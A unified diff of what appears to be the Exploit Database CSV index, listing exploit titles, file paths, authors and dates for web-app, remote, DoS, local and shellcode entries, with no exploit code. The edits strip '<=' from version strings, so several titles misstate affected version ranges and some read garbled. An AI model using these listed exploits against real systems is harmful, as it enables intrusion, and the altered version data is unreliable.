Johnson",linux,remote,0 33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0 33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0 -34143,platforms/windows/remote/34143.txt,"XnView <= 1.97.4 - MBM File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0 +34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - MBM File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0 34144,platforms/php/webapps/34144.txt,"Joomla! 'com_easygb' Component - 'Itemid' Parameter Cross-Site Scripting",2010-06-08,"L0rd CrusAd3r",php,webapps,0 -34145,platforms/unix/dos/34145.txt,"Python <= 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0 +34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'username' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0 33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,Metasploit,hardware,remote,80 @@ -30523,14 +30523,14 @@ id,file,description,date,author,platform,type,port 33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Security Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0 33875,platforms/php/webapps/33875.txt,"HuronCMS 'index.php' Multiple SQL Injection Vulnerabilities",2010-03-30,mat,php,webapps,0 33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote DoS and arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 -33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET <= 12.0 - Remote Root Exploit",2007-09-25,mu-b,multiple,remote,0 -33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 -33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP <= 13.0 Remote DoS",2007-10-02,mu-b,multiple,dos,0 +33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Root Exploit",2007-09-25,mu-b,multiple,remote,0 +33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 +33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 Remote DoS",2007-10-02,mu-b,multiple,dos,0 33882,platforms/php/webapps/33882.txt,"Cyber CMS 'faq.php' SQL Injection",2009-11-26,hc0de,php,webapps,0 33883,platforms/php/webapps/33883.txt,"Kasseler CMS 2.0.5 - 'index.php' Cross-Site Scripting",2010-04-26,indoushka,php,webapps,0 33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 ZLanguage.php lang Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0 33885,platforms/php/webapps/33885.txt,"Zikula Application Framework 1.2.2 index.php func Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0 -33886,platforms/linux/dos/33886.txt,"Linux Kernel <= 2.6.34 - 'find_keyring_by_name()' Local Memory Corruption",2010-04-27,"Toshiyuki Okajima",linux,dos,0 +33886,platforms/linux/dos/33886.txt,"Linux Kernel 2.6.34 - 'find_keyring_by_name()' Local Memory Corruption",2010-04-27,"Toshiyuki Okajima",linux,dos,0 33887,platforms/cgi/webapps/33887.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"Onur Alanbel (BGA)",cgi,webapps,0 33888,platforms/php/webapps/33888.txt,"ProArcadeScript 'search.php' Cross-Site Scripting",2010-04-27,Sid3^effects,php,webapps,0 33889,platforms/php/webapps/33889.txt,"SmartBlog 1.3 SQL Injection and Cross-Site Scripting Vulnerabilities",2010-04-27,indoushka,php,webapps,0 @@ -30566,7 +30566,7 @@ id,file,description,date,author,platform,type,port 33969,platforms/php/webapps/33969.txt,"eFront 3.x - 'ask_chat.php' SQL Injection",2010-05-09,"Stefan Esser",php,webapps,0 33970,platforms/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 URI Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps,0 33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 - Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0 -33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 - Local File Include and HTML Injection Vulnerabilities",2010-04-30,"Jordi Chancel",php,webapps,0 +33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 - Local File Inclusion and HTML Injection Vulnerabilities",2010-04-30,"Jordi Chancel",php,webapps,0 33914,platforms/php/webapps/33914.txt,"4xcms - 'login.php' Multiple SQL Injection Vulnerabilities",2010-03-21,"cr4wl3r ",php,webapps,0 33915,platforms/php/webapps/33915.txt,"Campsite 3.x - 'article_id' Parameter SQL Injection",2010-04-30,"Stefan Esser",php,webapps,0 33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 - 'archives.cfm/search' Cross-Site Scripting",2010-05-03,MustLive,cfm,webapps,0 @@ -30574,16 +30574,16 @@ id,file,description,date,author,platform,type,port 33918,platforms/php/webapps/33918.txt,"CF Image Hosting Script 1.1 - 'upload.php' Arbitrary File Upload",2010-05-01,The.Morpheus,php,webapps,0 33919,platforms/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 - Cross-Site Scripting and SQL Injection Vulnerabilities",2010-05-01,ekse,php,webapps,0 33920,platforms/php/remote/33920.php,"PHP 5.3 - 'php_dechunk()' HTTP Chunked Encoding Integer Overflow",2010-05-02,"Stefan Esser",php,remote,0 -33921,platforms/php/webapps/33921.txt,"IslamSound Multiple Remote SQL Injection Vulnerabilities",2010-05-03,JIKO,php,webapps,0 +33921,platforms/php/webapps/33921.txt,"IslamSound Multiple SQL Injection Vulnerabilities",2010-05-03,JIKO,php,webapps,0 33922,platforms/php/webapps/33922.txt,"CH-CMS.ch 2 - Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,php,webapps,0 33923,platforms/asp/webapps/33923.txt,"SamaGraph CMS 'inside.aspx' SQL Injection",2010-03-11,K053,asp,webapps,0 33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",windows,dos,0 33925,platforms/php/webapps/33925.txt,"ecoCMS 18.4.2010 - 'admin.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 - Remote Denial of Service",2010-04-29,"Bisphemol A",windows,dos,0 33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script 'listtest.php' SQL Injection",2010-02-09,JIKO,php,webapps,0 -33988,platforms/php/remote/33988.txt,"PHP 5.x (5.3.x <= 5.3.2) - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 +33988,platforms/php/remote/33988.txt,"PHP 5.x (5.3.x 5.3.2) - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,Metasploit,windows,remote,9002 -33929,platforms/multiple/remote/33929.py,"Gitlist <= 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0 +33929,platforms/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0 33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS",2014-07-02,Provensec,php,webapps,80 33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross-Site Scripting",2010-05-07,"Ruben Santamarta ",asp,webapps,0 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081 @@ -30604,7 +30604,7 @@ id,file,description,date,author,platform,type,port 33946,platforms/php/webapps/33946.txt,"EmiratesHost Insecure Cookie Authentication Bypass",2010-02-01,jago-dz,php,webapps,0 33947,platforms/php/webapps/33947.txt,"Last Wizardz 'id' Parameter SQL Injection",2010-01-31,"Sec Attack Team",php,webapps,0 33948,platforms/cfm/webapps/33948.txt,"Site Manager 3.0 - 'id' Parameter SQL Injection",2010-01-31,"Sec Attack Team",cfm,webapps,0 -33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow",2010-05-06,"Michael Santos",linux,remote,0 +33949,platforms/linux/remote/33949.txt,"PCRE 6.2 Regular Expression Compiling Workspace Buffer Overflow",2010-05-06,"Michael Santos",linux,remote,0 33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection",2010-01-31,s4r4d0,php,webapps,0 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (DoS)",2014-07-02,LiquidWorm,windows,dos,0 34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent XSS",2014-07-18,Vulnerability-Lab,cgi,webapps,3378 @@ -30683,8 +30683,8 @@ id,file,description,date,author,platform,type,port 34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal",2010-05-28,"John Leitch",windows,dos,0 34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection",2010-05-28,"Christopher Schramm",php,webapps,0 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0 -34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Include",2010-05-30,eidelweiss,php,webapps,0 -34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0 +34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0 +34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0 34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0 34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0 34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0 @@ -30700,8 +30700,8 @@ id,file,description,date,author,platform,type,port 34070,platforms/php/webapps/34070.txt,"Datetopia Match Agency BiZ Multiple Cross-Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps,0 34071,platforms/php/webapps/34071.txt,"Joomla! 'com_sar_news' Component - 'id' Parameter SQL Injection",2010-06-02,LynX,php,webapps,0 34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0 -34073,platforms/php/webapps/34073.py,"TCExam <= 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0 -34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) 'locale' Parameter Local File Include",2010-06-21,"Pouya Daneshmand",multiple,remote,0 +34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0 +34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0 34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 @@ -30729,7 +30729,7 @@ id,file,description,date,author,platform,type,port 34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x manage/main.php fld_path Parameter XSS",2010-06-06,"High-Tech Bridge SA",php,webapps,0 34154,platforms/php/webapps/34154.txt,"Software Index - 'signinform.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0 34155,platforms/php/webapps/34155.txt,"Ceica-GW 'login.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0 -34156,platforms/windows/remote/34156.pl,"TurboFTP Server <= 1.20.745 - Directory Traversal",2010-06-17,leinakesi,windows,remote,0 +34156,platforms/windows/remote/34156.pl,"TurboFTP Server 1.20.745 - Directory Traversal",2010-06-17,leinakesi,windows,remote,0 34157,platforms/php/webapps/34157.txt,"Firebook Multiple Cross-Site Scripting and Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0 34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 - 'page' Parameter Cross-Site Scripting",2010-06-07,"Adam Baldwin",windows,remote,0 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 @@ -30746,10 +30746,10 @@ id,file,description,date,author,platform,type,port 34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - 'modules/blog/index.php' HTML Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps,0 34105,platforms/php/webapps/34105.txt,"WordPress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 -34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager 'target' Parameter Local File Include",2010-06-07,"AnTi SeCuRe",php,webapps,0 +34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager 'target' Parameter Local File Inclusion",2010-06-07,"AnTi SeCuRe",php,webapps,0 34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 - 'key' Parameter Cross-Site Scripting",2010-06-07,"High-Tech Bridge SA",php,webapps,0 34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 - 'url' Parameter Cross-Site Scripting",2009-01-08,"Patrick Webster",java,webapps,0 -34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0 +34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Inclusion Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0 34110,platforms/php/webapps/34110.txt,"PG Auto Pro SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-09,Sid3^effects,php,webapps,0 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 @@ -30764,12 +30764,12 @@ id,file,description,date,author,platform,type,port 34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - ptrace/sysret Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0 34161,platforms/php/webapps/34161.txt,"WordPress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 -34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 +34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0 34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0 -34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! Component 1.1 SQL Injection and Local File Include Vulnerabilities",2010-06-18,jdc,php,webapps,0 +34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! Component 1.1 SQL Injection and Local File Inclusion Vulnerabilities",2010-06-18,jdc,php,webapps,0 34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0 -34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0 +34152,platforms/linux/remote/34152.txt,"CUPS 1.4.2 Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0 34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution Exploit",2014-07-24,LiquidWorm,php,remote,80 34162,platforms/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos,0 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 @@ -30806,7 +30806,7 @@ id,file,description,date,author,platform,type,port 34197,platforms/php/webapps/34197.txt,"AbleSpace 1.0 - 'news.php' SQL Injection",2010-06-25,JaMbA,php,webapps,0 34198,platforms/php/webapps/34198.txt,"Limny 2.1 - 'q' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34200,platforms/hardware/remote/34200.txt,"Cisco Adaptive Security Response HTTP Response Splitting",2010-06-25,"Daniel King",hardware,remote,0 -34201,platforms/linux/remote/34201.txt,"feh <= 1.7 - '--wget-timestamp' Remote Code Execution",2010-06-25,anonymous,linux,remote,0 +34201,platforms/linux/remote/34201.txt,"feh 1.7 - '--wget-timestamp' Remote Code Execution",2010-06-25,anonymous,linux,remote,0 34203,platforms/hardware/dos/34203.txt,"Dlink DWR-113 Rev. Ax - CSRF Denial of Service",2014-07-30,"Blessen Thomas",hardware,dos,0 34204,platforms/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple CSRF And Persistent XSS Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80 34205,platforms/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution Exploit",2014-07-30,LiquidWorm,php,webapps,80 @@ -30814,9 +30814,9 @@ id,file,description,date,author,platform,type,port 34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector 'id' Parameter SQL Injection",2010-06-28,Tr0y-x,php,webapps,0 34208,platforms/hardware/remote/34208.txt,"D-Link DAP-1160 Wireless Access Point DCC Protocol Security Bypass",2010-06-28,"Cristofaro Mune",hardware,remote,0 34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS 'Username' Parameter SQL Injection",2010-06-28,S.W.T,php,webapps,0 -34210,platforms/php/webapps/34210.txt,"OneCMS <= 2.6.1 admin/admin.php cat Parameter XSS",2010-06-24,"High-Tech Bridge SA",php,webapps,0 -34211,platforms/php/webapps/34211.html,"OneCMS <= 2.6.1 - search.php search Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0 -34212,platforms/php/webapps/34212.html,"OneCMS <= 2.6.1 admin/admin.php Short1 Parameter XSS",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 admin/admin.php cat Parameter XSS",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - search.php search Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 admin/admin.php Short1 Parameter XSS",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34213,platforms/php/webapps/34213.txt,"PHP Bible Search bible.php chapter Parameter SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0 34214,platforms/php/webapps/34214.txt,"PHP Bible Search bible.php chapter Parameter XSS",2010-06-29,"L0rd CrusAd3r",php,webapps,0 34215,platforms/php/webapps/34215.txt,"MySpace Clone 2010 SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-28,"L0rd CrusAd3r",php,webapps,0 @@ -30831,7 +30831,7 @@ id,file,description,date,author,platform,type,port 34224,platforms/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery and HTML Injection Vulnerabilities",2010-06-29,TurboBorland,multiple,webapps,0 34225,platforms/php/webapps/34225.txt,"TornadoStore 1.4.3 - SQL Injection and HTML Injection Vulnerabilities",2010-06-29,"Lucas Apa",php,webapps,0 34226,platforms/php/webapps/34226.txt,"System CMS Contentia 'news.php' SQL Injection",2010-06-30,GlaDiaT0R,php,webapps,0 -34227,platforms/windows/dos/34227.txt,"Qt <= 4.6.3 - Remote Denial of Service",2010-06-29,"Luigi Auriemma",windows,dos,0 +34227,platforms/windows/dos/34227.txt,"Qt 4.6.3 - Remote Denial of Service",2010-06-29,"Luigi Auriemma",windows,dos,0 34228,platforms/linux/dos/34228.txt,"Mumble Murmur 1.2 - Denial of Service",2010-06-29,"Luigi Auriemma",linux,dos,0 34229,platforms/php/webapps/34229.txt,"ArcademSX 2.904 - 'cat' Parameter Cross-Site Scripting",2010-06-29,"Th3 RDX",php,webapps,0 34230,platforms/windows/remote/34230.txt,"Freewebscriptz Online Games Login Multiple SQL Injection Vulnerabilities",2009-12-31,"Hussin X",windows,remote,0 @@ -30855,7 +30855,7 @@ id,file,description,date,author,platform,type,port 34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",multiple,dos,0 34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0 -34250,platforms/php/webapps/34250.txt,"Miniwork Studio Canteen 1.0 Component for Joomla! SQL Injection and Local File Include Vulnerabilities",2010-07-05,Drosophila,php,webapps,0 +34250,platforms/php/webapps/34250.txt,"Miniwork Studio Canteen 1.0 Component for Joomla! SQL Injection and Local File Inclusion Vulnerabilities",2010-07-05,Drosophila,php,webapps,0 34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial Of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0 34252,platforms/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 - 'alert.php' Cross-Site Scripting",2010-07-06,"Andrea Bocchetti",php,webapps,0 34253,platforms/php/webapps/34253.txt,"Orbis CMS 1.0.2 - 'editor-body.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 @@ -30866,7 +30866,7 @@ id,file,description,date,author,platform,type,port 34258,platforms/php/webapps/34258.txt,"NewsOffice 2.0.18 - 'news_show.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 - 'fImg' Parameter Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 34260,platforms/php/webapps/34260.txt,"odCMS 1.07 - 'archive.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0 -34261,platforms/multiple/dos/34261.txt,"Unreal Engine <= 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",multiple,dos,0 +34261,platforms/multiple/dos/34261.txt,"Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",multiple,dos,0 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod (777 /etc/passwd & /etc/shadow)_ Add New Root User (ALI/ALI) & Execute /bin/sh shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 34263,platforms/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal",2014-08-04,Vulnerability-Lab,ios,webapps,8080 34264,platforms/ios/webapps/34264.txt,"FreeDisk 1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,ios,webapps,8080 @@ -30879,10 +30879,10 @@ id,file,description,date,author,platform,type,port 34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution",2010-07-05,"Luigi Auriemma",multiple,remote,0 34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow Privilege Escalation",2014-08-05,"ryujin & sickness",windows,local,0 34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80 -34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0 -34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",linux,dos,0 +34278,platforms/linux/dos/34278.txt,"LibTIFF 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0 +34279,platforms/linux/dos/34279.txt,"LibTIFF 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",linux,dos,0 34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80 -34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 - 'AcroForm.api' Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 +34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader 9.3.4 - 'AcroForm.api' Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 34277,platforms/php/webapps/34277.txt,"Feng Office - Stored XSS",2014-08-06,"Juan Sacco",php,webapps,0 34527,platforms/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner DLL Loading Arbitrary Code Execution",2010-08-25,Kolor,windows,webapps,0 34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 @@ -30904,7 +30904,7 @@ id,file,description,date,author,platform,type,port 34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0 34297,platforms/multiple/remote/34297.txt,"dotDefender Cross-Site Scripting Security Bypass",2010-07-09,SH4V,multiple,remote,0 34298,platforms/php/webapps/34298.py,"CMS Made Simple Download Manager 1.4.1 Module Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0 -34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 - 'default_cms_lang' Parameter Local File Include",2010-07-11,"John Leitch",php,webapps,0 +34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 - 'default_cms_lang' Parameter Local File Inclusion",2010-07-11,"John Leitch",php,webapps,0 34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0 34301,platforms/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 - Multiple Vulnerabilities",2010-07-12,TurboBorland,multiple,remote,0 34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0 @@ -30914,9 +30914,9 @@ id,file,description,date,author,platform,type,port 34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0 34308,platforms/php/webapps/34308.txt,"TomatoCart 1.x - SQL Injection",2014-08-09,Breaking.Technology,php,webapps,80 34309,platforms/solaris/dos/34309.txt,"Oracle Solaris - 'rdist' Local Privilege Escalation",2010-07-13,"Monarch Rich",solaris,dos,0 -34310,platforms/multiple/remote/34310.txt,"Oracle Business Process Management <= 10.3.2 - Cross-Site Scripting",2010-07-13,Markot,multiple,remote,0 +34310,platforms/multiple/remote/34310.txt,"Oracle Business Process Management 10.3.2 - Cross-Site Scripting",2010-07-13,Markot,multiple,remote,0 